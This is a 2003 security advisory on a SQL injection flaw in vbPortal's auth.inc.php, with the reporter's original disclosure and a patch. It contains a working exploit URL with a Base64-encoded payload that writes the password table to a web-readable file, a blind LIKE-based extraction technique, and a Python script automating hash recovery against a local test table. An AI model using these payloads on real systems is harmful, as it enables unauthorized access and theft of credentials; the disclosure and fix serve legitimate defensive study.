SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  vbPortal
Vendors:  phpPortals
vbPortal 'auth.inc.php' Input Validation Flaw Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1007695
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Sep 13 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes
Version(s): 2.0 alpha 8.1
Description:  A vulnerability was reported in vbPortal. A remote user can inject SQL commands to be executed by the underlying database server.

Frog-m@n reported that the 'auth.inc.php' script does not properly validate user-supplied input. The script Base64-decodes the 'admin' request variable, splits the result on ':' into an account name ($aid) and a password ($pwd), and interpolates $aid directly into a SELECT statement. Because the decoding happens after the request is received, PHP's magic_quotes_gpc escaping (applied to the raw, Base64-encoded value) does not touch the quotes in the decoded text, so the flaw is exploitable whether that setting is on or off. A remote user can submit a specially crafted value for the 'admin' variable to cause user-specified SQL commands to be executed by the database server.

For example, a remote user can craft a request to execute the following SQL:

SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt'

This demonstration exploit will reportedly cause the passwords from the 'user' table to be written into a file ('UserTable.txt') that can then be downloaded via the web server. The 'admin' value is the Base64 encoding of the injected $aid string followed by ':1' (the ':1' supplies a non-empty $pwd so the script does not exit at its empty-value check):

http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=

Note that INTO OUTFILE requires the FILE privilege on the account the application connects with, the file is written by the MySQL server process (which must be able to write to a directory the web server serves), and MySQL refuses to overwrite an existing file. The reporter also describes a blind variant that does not depend on those conditions: an $aid value such as ' OR pwd LIKE 'a% tests whether a stored password begins with a given character, so a value can be recovered one character at a time.

Impact:  A remote user can cause SQL commands to be executed on the underlying database server.
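The request path described above, worked through as an added example. This is not SecurityTracker's or vbPortal's code: it is a Python port of the relevant lines of auth.inc.php run against an in-memory SQLite table with constructed sample rows. It builds the Base64 'admin' value from the advisory's payload, shows that applying PHP-style magic_quotes_gpc escaping to the raw parameter before decoding leaves the decoded quotes intact, reproduces the interpolated query, renders the addslashes() variant from the unofficial patch in the source message as a string (MySQL escaping syntax, not executed under SQLite), and runs the LIKE-based oracle the reporter mentions, narrowed to a single account so that it recovers a known hash deterministically. The table contents, the sample hashes, the use of the column name `password` rather than the SELECT alias `pwd` (MySQL does not accept select-list aliases in a WHERE clause), and the assumption that an attacker can tell a row-returning query from an empty one are all assumptions of the example, not facts from the advisory.

```python
import base64
import sqlite3

# Constructed sample rows standing in for vbPortal's `user` table (assumption);
# the first hash is md5("password"), any hex digest would do.
SAMPLE_USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("bob", "a9b7ba70783b617e9998dc4dd82eb3c5"),
]
HEX = "0123456789abcdef"

# Payload and its encoded form as quoted in the advisory.
OUTFILE_PAYLOAD = "' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt"
ADVISORY_ADMIN = "JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE="


def make_db():
    """In-memory stand-in for the MySQL `user` table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def addslashes(s):
    """PHP addslashes(): backslash before backslash, single quote, double quote and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def encode_admin(aid, pwd="1"):
    """The ?admin= value the advisory describes: base64(aid:pwd)."""
    return base64.b64encode(f"{aid}:{pwd}".encode()).decode()


def split_admin(admin_param, magic_quotes_gpc=False):
    """Mirror auth.inc.php: base64_decode, then explode(':') into ($aid, $pwd).

    magic_quotes_gpc, when on, escapes the *raw* GET value. The Base64 alphabet
    contains nothing addslashes() touches, so the quotes inside the decoded
    text come through unchanged either way.
    """
    if magic_quotes_gpc:
        admin_param = addslashes(admin_param)
    decoded = base64.b64decode(admin_param).decode()
    aid, _, pwd = decoded.partition(":")
    return aid, pwd


def vulnerable_query(aid):
    """The interpolated SQL from the vulnerable line, verbatim."""
    return f"SELECT password as pwd FROM user WHERE username = '{aid}'"


def patched_query(aid):
    """The unofficial patch's variant: $aid = addslashes($admin[0]) after decoding.
    Returned as a string only; backslash escaping is MySQL syntax, not SQLite's."""
    return vulnerable_query(addslashes(aid))


def like_oracle(conn, username, prefix):
    """Blind oracle from the advisory, narrowed to one account. Assumes the attacker
    can distinguish a query that returns a row from one that returns none."""
    aid = f"' OR username = '{username}' AND password LIKE '{prefix}%"
    return conn.execute(vulnerable_query(aid)).fetchone() is not None


def extract_password(conn, username, max_len=32):
    """Recover a hex digest one character at a time through like_oracle()."""
    found = ""
    for _ in range(max_len):
        for c in HEX:
            if like_oracle(conn, username, found + c):
                found += c
                break
        else:
            break  # no hex character extends the prefix: digest is complete
    return found


def safe_lookup(conn, aid):
    """What the lookup should have been: a bound parameter, never string interpolation."""
    row = conn.execute("SELECT password AS pwd FROM user WHERE username = ?", (aid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("advisory encoding reproduced:", encode_admin(OUTFILE_PAYLOAD) == ADVISORY_ADMIN)
    aid, pwd = split_admin(ADVISORY_ADMIN, magic_quotes_gpc=True)
    print("decoded $aid with magic_quotes on:", aid)
    print("vulnerable SQL:", vulnerable_query(aid))
    print("patched SQL:   ", patched_query(aid))
    print("admin hash via LIKE oracle:", extract_password(db, "admin"))
    print("same payload, bound parameter:", safe_lookup(db, "' OR username = 'admin' AND password LIKE '5%"))
```

The addslashes() patch closes the quoted-string break shown here, but it is only as good as the database's handling of backslash escapes; a bound parameter, as in safe_lookup(), removes the question entirely.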
Solution:  No solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/

Vendor URL:  www.vbportal.com/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.


 Source Message Contents

Date:  Sat, 13 Sep 2003 00:08:25 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] vbPortal : SQL Injection

 

Information :
°°°°°°°°°°°°°
Language : PHP
Version : 2.0 alpha 8.1
Website : http://www.vbportal.com
Problem : SQL Injection
Description : vbPortal is a Portal made to complement vBulletin as a CMS.

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
auth.inc.php :
-----------------------------------------------------------------------------------------
[...]
if(isset($admin)) {
  // $admin arrives Base64-encoded and is decoded here, after any magic_quotes_gpc escaping
  $admin = base64_decode($admin);
  $admin = explode(":", $admin);
  $aid = "$admin[0]";
  $pwd = "$admin[1]";
  if ($aid=="" || $pwd=="") {
    $admintest=0;
    echo "<html>\n";
    echo "<title>INTRUDER ALERT!!!</title>\n";
    echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
    echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
    echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!</b></font></center>\n";
    echo "</body>\n";
    echo "</html>\n";
    exit;
  }
  // $aid is interpolated into the query without escaping
  $result=mysql_query("SELECT password as pwd FROM user WHERE username = '$aid'");
  // $result=mysql_query("select pwd from $prefix"._authors." where aid='$aid'");
  if(!$result) {
    echo "Selection from database failed!";
    exit;
  } else {
    list($pass)=mysql_fetch_row($result);
    if($pass == $pwd && $pass != "") {
      $admintest = 1;
    }
  }
[...]
-----------------------------------------------------------------------------------------

Exploit :
°°°°°°°°°
The injection is made through $aid. If the value of $aid is

' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt

the SQL request becomes:

SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt'

and the passwords of the table user can be written into UserTable.txt, which is readable at http://[target]/UserTable.txt if '/complete/path/' is the right path to the website directory.

Passwords can also be cracked using LIKE. For example, to know whether the encrypted password begins with 'a', you can give $aid the value

' OR pwd LIKE 'a%

To inject either of the two possibilities, we have to use $admin like this: base64([VALUETOGIVETO$AID]:1).

E.g., to use the first example, we have to encode

' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1

in base64, like this:

JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=

and inject it via $admin like this:

http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=

This will of course work whether magic_quotes_gpc is ON or OFF.

Solution :
°°°°°°°°°°
A patch can be found at http://www.phpsecure.info. You just have to replace the line:
---------------------
$aid = "$admin[0]";
---------------------
in auth.inc.php with:
-------------------------------
$aid = addslashes($admin[0]);
-------------------------------

More details in French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info/v2/tutos/vbPortal.txt

frog-m@n (http://www.phpsecure.info)


Copyright 2002, SecurityGlobal.net LLC